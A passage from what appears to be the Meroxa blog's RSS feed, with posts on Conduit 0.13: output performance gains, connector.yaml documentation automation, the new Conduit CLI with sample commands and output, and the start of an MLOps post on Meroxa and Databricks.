&lt;h2&gt;5x Performance Boost for Output Processing&lt;/h2&gt;
&lt;h3&gt;Why This Matters&lt;/h3&gt;
&lt;p&gt;For high-throughput data streaming, performance is critical. Previously, output processing could become a bottleneck in large-scale workloads, leading to latency and inefficiencies.&lt;/p&gt;
&lt;h3&gt;How We Improved It&lt;/h3&gt;
&lt;p&gt;Conduit 0.13 introduces a &lt;strong&gt;5x increase in output throughput&lt;/strong&gt;, achieved through:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Parallelized Processing&lt;/strong&gt; - Output tasks now run concurrently, reducing execution bottlenecks.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Optimized Memory Allocation&lt;/strong&gt; - Enhanced buffer management leads to lower memory overhead and increased efficiency.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Lock-Free Data Processing&lt;/strong&gt; - Reduced contention on shared resources significantly speeds up write operations.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/worker-task.png&quot; alt=&quot;worker-task.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;🚀 &lt;strong&gt;Optimize your workflows today!&lt;/strong&gt; Upgrade to Conduit 0.13 to experience these performance improvements firsthand.&lt;/p&gt;
&lt;p&gt;📊 &lt;strong&gt;Curious about the benchmarks?&lt;/strong&gt; Read our &lt;a href=&quot;https://meroxa.com/blog/optimizing-conduit---5x-the-throughput/&quot;&gt;performance deep dive&lt;/a&gt;.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Get Started with Conduit 0.13 Today&lt;/h2&gt;
&lt;p&gt;The enhancements in Conduit 0.13 make it a &lt;strong&gt;more powerful, developer-friendly platform&lt;/strong&gt; for building scalable real-time pipelines. Whether you’re automating documentation, leveraging the new CLI, or enjoying high-throughput data movement, this release delivers meaningful improvements.&lt;/p&gt;
&lt;h3&gt;What’s Next?&lt;/h3&gt;
&lt;p&gt;✅ &lt;strong&gt;Start using the Conduit CLI&lt;/strong&gt;: &lt;code class=&quot;language-text&quot;&gt;$ conduit --help&lt;/code&gt;
✅ &lt;strong&gt;Automate connector documentation&lt;/strong&gt; with &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt;
✅ &lt;strong&gt;Experience performance gains&lt;/strong&gt; with 5x output speed improvements
✅ &lt;strong&gt;Read the full release notes&lt;/strong&gt; &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases&quot;&gt;here&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;💬 &lt;strong&gt;We’d love your feedback!&lt;/strong&gt; Join the conversation on &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; or start a discussion in our &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub Discussions&lt;/a&gt;. 🚀&lt;/p&gt;
&lt;p&gt;📝 &lt;strong&gt;Stay Updated!&lt;/strong&gt; Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Automating documentation for 100+ connectors]]></title><description><![CDATA[The Conduit 0.13 release introduces `connector.yaml`, a powerful automation tool that ensures connector documentation stays up to date with the latest configuration changes. By centralizing connector metadata—such as parameters, descriptions, and validation rules—developers can seamlessly sync documentation across repositories and the official Conduit docs. With the `conn-sdk-cli` tool, updating documentation is as simple as running a command, eliminating manual updates and reducing errors. This release enhances the developer experience, improves documentation consistency, and streamlines real-time data pipeline management. Start using `connector.yaml` today and automate your documentation workflow! 🚀]]></description><link>https://meroxa.com/blog/automating-documentation-for-100-connectors</link><guid isPermaLink="false">https://meroxa.com/blog/automating-documentation-for-100-connectors</guid><dc:creator><![CDATA[Haris Osmanagić]]></dc:creator><pubDate>Wed, 05 Feb 2025 19:27:00 GMT</pubDate><content:encoded>&lt;p&gt;Managing &lt;strong&gt;real-time data pipelines&lt;/strong&gt; across hundreds of different systems requires &lt;strong&gt;consistent, accurate, and up-to-date documentation&lt;/strong&gt;. With Conduit 0.13, we’ve automated &lt;strong&gt;connector documentation&lt;/strong&gt; using &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt;, ensuring &lt;strong&gt;seamless synchronization between code and documentation&lt;/strong&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;The Challenge: Keeping Connector Documentation in Sync&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Conduit supports &lt;strong&gt;reading and writing data&lt;/strong&gt; to hundreds of systems. As the number of connectors grows, &lt;strong&gt;maintaining consistent documentation&lt;/strong&gt; becomes increasingly difficult. Traditionally, connector configurations were documented in &lt;strong&gt;README files&lt;/strong&gt; within repositories, requiring &lt;strong&gt;manual updates&lt;/strong&gt; whenever a parameter changed. Over time, this led to outdated information and increased developer friction.&lt;/p&gt;
&lt;h3&gt;Goals&lt;/h3&gt;
&lt;h4&gt;1: Connector configuration is documented and always up-to-date&lt;/h4&gt;
&lt;p&gt;A connector’s configuration is usually documented in the README file in the connector’s repository. As the configurations change in code, it’s easy to forget about updating the README file, especially if changes are not too big (like changing a parameter’s default value, the description, for example.). We also need this process to be automated.&lt;/p&gt;
&lt;h4&gt;2: A central place with all connector information&lt;/h4&gt;
&lt;p&gt;Having a central place with all the connector information makes it easier to explore Conduit, and find the needed components for a pipeline that needs to be built and configured. This place is &lt;a href=&quot;https://conduit.io/docs/&quot;&gt;our website&lt;/a&gt;, where we already have a connectors &lt;a href=&quot;https://conduit.io/docs/using/connectors/list/&quot;&gt;list&lt;/a&gt;, and where we will be adding dedicated documentation pages for each connector.&lt;/p&gt;
&lt;h4&gt;3: Easy to use for developers&lt;/h4&gt;
&lt;p&gt;All the documentation needs to be in sync with the configuration code written by a connector&apos;s developer. Every connector has a description that can become quite lengthy and, in our experience, is very cumbersome to write in the code. Plus, there are no formatting options. Hence, our goal was to give developers an easy way to sync the documentation with code and  easily describe what a connector is doing.&lt;/p&gt;
&lt;h3&gt;The solution&lt;/h3&gt;
&lt;p&gt;The source of truth for a connector’s configuration is in the code, in the configuration structs. That means that the process that updates a connector’s README file and our website needs to read the configuration code (&lt;em&gt;eventually&lt;/em&gt;). However, the code is not enough. As mentioned above, connector descriptions are best placed outside the connector code.&lt;/p&gt;
&lt;p&gt;That led us to a solution where a connector’s specification (name, description, configuration parameters, etc.) are written to a file that can easily be read by other tools, i.e. uses a widely used file format. That’s how &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt; was born.&lt;/p&gt;
&lt;h3&gt;What is &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt;?&lt;/h3&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt; is a file that contains information about a connector and its parameter validations. It’s central to all of our tooling that ensures the documentation is always up-to-date and can be collected into a single place.&lt;/p&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;connectors.yaml&lt;/code&gt; lives in the root of a connector&apos;s repository. The following is an example of the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-file&quot;&gt;file connector&apos;s&lt;/a&gt;&lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;1.0&quot;&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;specification&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; file
  &lt;span class=&quot;token key atrule&quot;&gt;summary&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; A file source and destination plugin for Conduit.
  &lt;span class=&quot;token key atrule&quot;&gt;description&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;|&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;
    The file source allows you to listen to a local file and
    detect any changes happening to it. Each change will create a new record. The
    destination allows you to write record payloads to a destination file&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; each new record payload is appended to the file in a new line.
  &lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; v0.10.0
  &lt;span class=&quot;token key atrule&quot;&gt;author&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; Meroxa&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; Inc.
  &lt;span class=&quot;token key atrule&quot;&gt;source&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;parameters&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; path
        &lt;span class=&quot;token key atrule&quot;&gt;description&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; Path is the file path used by the connector to read/write records.
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; string
        &lt;span class=&quot;token key atrule&quot;&gt;default&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;validations&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; required
            &lt;span class=&quot;token key atrule&quot;&gt;value&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;# other parameters &lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A connector developer can then simply run &lt;code class=&quot;language-text&quot;&gt;conn-sdk-cli readmegen&lt;/code&gt; (as explained &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-sdk/tree/main/conn-sdk-cli&quot;&gt;here&lt;/a&gt;), which will synchronize the README file with the configuration structs. Our &lt;a href=&quot;https://conduit.io/docs/&quot;&gt;documentation website&lt;/a&gt; uses the &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt; file to build a dedicated documentation page for a connector.&lt;/p&gt;
&lt;h3&gt;How is a &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt; populated?&lt;/h3&gt;
&lt;p&gt;The first part of a &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt; (name, summary, description, version, author) is filled out manually by the connector developer. &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt; is used in Markdown files (in the connector’s README and on our website), so you can use Markdown code here!&lt;/p&gt;
&lt;p&gt;Our &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-sdk/tree/main/conn-sdk-cli&quot;&gt;conn-sdk-cli&lt;/a&gt; tool updates the configuration parameters in &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt; automatically, as part of running &lt;code class=&quot;language-text&quot;&gt;go generate&lt;/code&gt;. Detailed instructions on how to do that can be found &lt;a href=&quot;https://conduit.io/docs/developing/connectors/connector-specification/&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Next steps&lt;/h3&gt;
&lt;p&gt;You’ll find more information about how to write a Conduit connector &lt;a href=&quot;https://conduit.io/docs/developing/connectors/&quot;&gt;here&lt;/a&gt;. If you’d like to take a look at some real-world examples, feel free to explore our &lt;a href=&quot;https://conduit.io/docs/using/connectors/list/&quot;&gt;existing connectors&lt;/a&gt;. ⚡&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Try &lt;code class=&quot;language-text&quot;&gt;conn-sdk-cli readmegen&lt;/code&gt; now and streamline your connector documentation!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;💬 &lt;strong&gt;Join the Conduit community!&lt;/strong&gt; Discuss with fellow developers on &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; or contribute via &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub Discussions&lt;/a&gt;. Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Introducing the New Conduit CLI: A Powerful Tool for Managing Your Pipelines]]></title><description><![CDATA[The Conduit 0.13 release introduces a powerful new CLI that simplifies real-time data pipeline management. With intuitive commands, developers can configure, monitor, and run pipelines directly from the terminal—eliminating complex API calls and manual configurations. Optimized for speed and efficiency, the CLI enhances deployment, troubleshooting, and high-throughput data streaming. Upgrade to Conduit 0.13 and streamline your data workflows today! Try it now with `$ conduit --help`. 🚀]]></description><link>https://meroxa.com/blog/introducing-the-new-conduit-cli-a-powerful-tool-for-managing-your-pipelines</link><guid isPermaLink="false">https://meroxa.com/blog/introducing-the-new-conduit-cli-a-powerful-tool-for-managing-your-pipelines</guid><dc:creator><![CDATA[Maha Mustafa]]></dc:creator><pubDate>Wed, 05 Feb 2025 18:53:00 GMT</pubDate><content:encoded>&lt;p&gt;Release 0.13 of Conduit brings to you our new &lt;strong&gt;Conduit CLI&lt;/strong&gt;, designed to make configuring, managing, and running Conduit smoother than ever. Built with our open-source &lt;a href=&quot;https://github.com/ConduitIO/ecdysis&quot;&gt;Ecdysis&lt;/a&gt; library, this CLI is a game-changer for users looking for efficiency and ease of use.&lt;/p&gt;
&lt;h2&gt;Why the Conduit CLI Matters&lt;/h2&gt;
&lt;p&gt;Before this update, managing Conduit pipelines and connectors often required a mix of API calls, configuration files, and going through documentation. The new Conduit CLI changes the game by offering a &lt;strong&gt;centralized command-line&lt;/strong&gt; that transforms these tasks into a simple, accessible tool.&lt;/p&gt;
&lt;p&gt;With Conduit CLI, you can now:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Manage connectors, connector plugins, processors, processor plugins, and pipelines effortlessly&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;List and describe Conduit components directly from the terminal&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Configure and Run Conduit components without leaving the CLI&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Easily initialize Conduit and get started&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Built on Ecdysis: A Flexible Library for CLI Tools&lt;/h2&gt;
&lt;p&gt;The Conduit CLI is powered by &lt;a href=&quot;https://github.com/ConduitIO/ecdysis&quot;&gt;Ecdysis&lt;/a&gt;, an open-source Go library designed to simplify CLI tool development. Ecdysis is built around &lt;a href=&quot;https://github.com/spf13/cobra&quot;&gt;spf13/cobra&lt;/a&gt;, acting as a wrapper to enhance its capabilities.&lt;/p&gt;
&lt;p&gt;Ecdysis provides a structured approach to building command-line applications, with many features that include the following, among others:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;A robust command structure&lt;/strong&gt; for defining and organizing commands efficiently.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automatic configuration parsing&lt;/strong&gt;, reducing the need for manual setup.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Flexible flag parsing&lt;/strong&gt;, making it easy to customize command behavior.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;By leveraging Ecdysis, Conduit CLI offers a consistent and extendable experience, making it easier for developers to interact with Conduit’s components using a well-architected CLI framework.&lt;/p&gt;
&lt;h2&gt;Getting Started with Conduit CLI&lt;/h2&gt;
&lt;p&gt;To check all the available commands, simply run:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit --help&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This will output a list of commands, as of the moment of writing, these include:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Available Commands:
  config            Shows the configuration to be used when running Conduit.
  connector-plugins Manage Connector Plugins.
  connectors        Manage Conduit Connectors.
  pipelines         Initialize and manage pipelines.
  processors        Manage Processors.
  run               Run Conduit.
  version           Show the current version of Conduit.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Each command is designed to give you control and observability over your data streaming pipelines. Let’s take a closer look at some of these key functionalities.&lt;/p&gt;
&lt;h2&gt;Initializing Conduit&lt;/h2&gt;
&lt;p&gt;The command &lt;code class=&quot;language-text&quot;&gt;conduit init&lt;/code&gt; creates the directories where you add your pipeline configuration files, connector binaries, and processor binaries. It also creates the file &lt;code class=&quot;language-text&quot;&gt;conduit.yaml&lt;/code&gt; that contains all the configuration parameters that Conduit supports.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit init

Created directory: processors
Created directory: connectors
Created directory: pipelines
Configuration file written to conduit.yaml

Conduit has been initialized!

To quickly create an example pipeline, run &apos;conduit pipelines init&apos;.
To see how you can customize your first pipeline, run &apos;conduit pipelines init --help&apos;.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You can also use the &lt;code class=&quot;language-text&quot;&gt;init&lt;/code&gt; command to initialize a pipeline configuration file with your choice of source and destination, example:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit pipelines init file-to-pg --source file --destination postgres&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This will initialize a pipeline configuration file, with all of the parameters for the source and destination connectors, by default the created file will be under the folder &lt;code class=&quot;language-text&quot;&gt;./pipelines&lt;/code&gt; , and in this case it would look like:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;version: &quot;2.2&quot;
pipelines:
  - id: example-pipeline
    status: running
    name: &quot;file-to-pg&quot;
    connectors:
      - id: example-source
        type: source
        plugin: &quot;file&quot;
        settings:
          # Path is the file path used by the connector to read/write records.
          # Type: string
          # Required
          path: &quot;&quot;
          ..
          .. # more params
          ..
          ..
      - id: example-destination
        type: destination
        plugin: &quot;postgres&quot;
        settings:
          # Key represents the column name for the key used to identify and
          # update existing rows.
          # Type: string
          # Optional
          key: &quot;&quot;
          ..
          ..
          .. # more params
          ..
          ..
          # Table is used as the target table into which records are inserted.
          # Type: string
          # Optional
          table: &apos;{{ index .Metadata &quot;opencdc.collection&quot; }}&apos;
          # URL is the connection string for the Postgres database.
          # Type: string
          # Required
          url: &quot;&quot;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;Managing Connector Plugins&lt;/h2&gt;
&lt;p&gt;One of the new additions to the Conduit CLI is the ability to list and describe available connector plugins.&lt;/p&gt;
&lt;h3&gt;Listing Connector Plugins&lt;/h3&gt;
&lt;p&gt;To list all available connector plugins, run:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit connector-plugins list&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This command displays a table of all the built-in and standalone connector plugins available to Conduit:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;+-------------------------------------+----------------------------------------+
|                 NAME                |                SUMMARY                 |
+-------------------------------------+----------------------------------------+
| builtin:file@v0.9.0                 | A file source and destination plugin.  |
| builtin:kafka@v0.11.1               | A Kafka source and destination plugin. |
| standalone:dynamodb@f9aeeee-dirty   | A DynamoDB source plugin for Conduit.  |
| standalone:grpc-client@v0.1.0       | A gRPC Source &amp;amp; Destination Client.    |
+-------------------------------------+----------------------------------------+&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Describing a Specific Plugin&lt;/h3&gt;
&lt;p&gt;To get more details about a specific plugin, use the &lt;code class=&quot;language-text&quot;&gt;describe&lt;/code&gt; command followed by the plugin name. For example, to learn more about the PostgreSQL plugin:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit connector-plugins describe builtin:postgres@v0.10.1&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This provides a detailed breakdown of the plugin, including the author, version, description, summary, and the parameters for both the source and destination. Here’s an example of what you’ll see:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Name: builtin:postgres@v0.10.1
Summary: A PostgreSQL source and destination plugin for Conduit.
Author: Meroxa, Inc.
Version: v0.10.1

Source Parameters:
+--------+--------+----------------------------------+---------+-------------+
| NAME   | TYPE   | DESCRIPTION                      | DEFAULT | VALIDATIONS |
+--------+--------+----------------------------------+---------+-------------+
| url    | string | Connection string for database.  | &quot;&quot;      | [required]  |
| tables | string | List of tables to listen to.     | &quot;&quot;      | [required]  |
+--------+--------+----------------------------------+---------+-------------+

Destination Parameters:
+------+--------+------------------+---------------------------------+----------+
| NAME | TYPE   | DESCRIPTION      |              DEFAULT            |VALIDATION|
+------+--------+------------------+---------------------------------+----------+
| url  | string | Connection string| &quot;&quot;                              |[required]|
| table| string | Target table     |{{.Metadata[opencdc.collection]}}|          | 
+------+--------+------------------+---------------------------------+----------+&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;Running Conduit&lt;/h2&gt;
&lt;p&gt;To run Conduit directly from the CLI, simply run:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit run&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This starts Conduit using the specified configurations.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Note: Most CLI commands require Conduit to be running for them to work properly, since they need access to the running components and their details.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Managing Pipelines, Connectors, and Processors&lt;/h2&gt;
&lt;p&gt;Beyond managing plugins, the Conduit CLI also provides access to &lt;strong&gt;pipelines, connectors, and processors&lt;/strong&gt;. These follow a similar command structure:&lt;/p&gt;
&lt;h3&gt;Pipelines&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;List all pipelines:&lt;/strong&gt; &lt;code class=&quot;language-text&quot;&gt;conduit pipelines list&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Describe a pipeline:&lt;/strong&gt; &lt;code class=&quot;language-text&quot;&gt;conduit pipelines describe &amp;lt;pipeline-id&gt;&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Connectors&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;List all connectors:&lt;/strong&gt; &lt;code class=&quot;language-text&quot;&gt;conduit connectors list&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Describe a connector:&lt;/strong&gt; &lt;code class=&quot;language-text&quot;&gt;conduit connectors describe &amp;lt;connector-id&gt;&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Processors&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;List all processors:&lt;/strong&gt; &lt;code class=&quot;language-text&quot;&gt;conduit processors list&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Describe a processor:&lt;/strong&gt; &lt;code class=&quot;language-text&quot;&gt;conduit processors describe &amp;lt;processor-id&gt;&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These commands give you more observability over your conduit pipelines and their components.&lt;/p&gt;
&lt;h2&gt;Why You Should Try Conduit CLI&lt;/h2&gt;
&lt;p&gt;The new Conduit CLI is an important addition for developers and users working with Conduit. By offering a &lt;strong&gt;fast, intuitive, and simple&lt;/strong&gt; way to manage Conduit components, the CLI will significantly &lt;strong&gt;improve productivity&lt;/strong&gt; and &lt;strong&gt;reduce complexity&lt;/strong&gt;.&lt;/p&gt;
&lt;h3&gt;Key Benefits:&lt;/h3&gt;
&lt;p&gt;✅ &lt;strong&gt;Easier management&lt;/strong&gt; of Conduit components via the command line&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Clear visibility&lt;/strong&gt; into available plugins and configurations&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Effortless setup&lt;/strong&gt; with the initialization commands&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Faster debugging&lt;/strong&gt; with detailed descriptions of connectors and pipelines&lt;/p&gt;
&lt;h2&gt;Get Started Today&lt;/h2&gt;
&lt;p&gt;The Conduit CLI is available now! If you haven’t already, install Conduit and give the CLI a try. For more details, check out our &lt;a href=&quot;https://conduit.io/docs/cli&quot;&gt;official documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;🚀 &lt;strong&gt;Run &lt;code class=&quot;language-text&quot;&gt;conduit --help&lt;/code&gt; and start exploring today!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;As always, we welcome your feedback and contributions to help shape the future of Conduit. Get involved by starting a &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions/&quot;&gt;GitHub Discussion&lt;/a&gt;, opening an &lt;a href=&quot;https://github.com/ConduitIO/conduit/issues&quot;&gt;issue&lt;/a&gt;, or joining our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord server&lt;/a&gt; and saying hello to the team behind Conduit! Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[No More Stale Models: Mastering Continuous MLOps with Meroxa & Databricks]]></title><description><![CDATA[No More Stale Models: Master Continuous MLOps with Meroxa & Databricks  

Keep your machine learning models fresh and accurate with real-time, automated MLOps. This blog explores how Meroxa’s Conduit Platform and Databricks enable continuous model retraining**, eliminating stale predictions and manual updates. Learn how to streamline data movement, real-time feature engineering, and automated ML workflows for peak performance. Whether for fraud detection, predictive maintenance, or personalized AI, discover how to scale MLOps efficiently. Stay ahead with always-on machine learning—no more stale models!]]></description><link>https://meroxa.com/blog/no-more-stale-models-mastering-continuous-mlops-with-meroxa-and-databricks</link><guid isPermaLink="false">https://meroxa.com/blog/no-more-stale-models-mastering-continuous-mlops-with-meroxa-and-databricks</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Wed, 05 Feb 2025 12:49:00 GMT</pubDate><content:encoded>&lt;p&gt;Data drives modern business success, especially in machine learning (ML). But deploying a model just once isn&apos;t enough anymore. Today&apos;s dynamic environment requires continuous learning, real-time decision-making, and automated feedback loops—core elements of MLOps (machine learning operations). This post shows you how to build a continuous MLOps pipeline using Meroxa for real-time data ingestion and stream processing, paired with Databricks for model development, deployment, and monitoring. You&apos;ll learn how to create a high-performing, low-latency ML pipeline that evolves automatically with your data.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;What Is MLOps?&lt;/h2&gt;
